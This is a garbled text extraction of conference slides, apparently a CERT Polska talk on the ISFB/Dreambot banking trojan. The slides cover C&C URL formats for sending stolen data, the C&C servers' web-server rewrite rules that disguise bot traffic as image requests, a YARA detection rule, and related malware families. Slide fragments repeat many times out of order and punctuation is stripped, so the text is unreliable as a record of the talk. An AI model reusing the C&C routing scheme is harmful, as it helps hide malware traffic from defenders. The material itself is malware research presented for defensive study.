httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
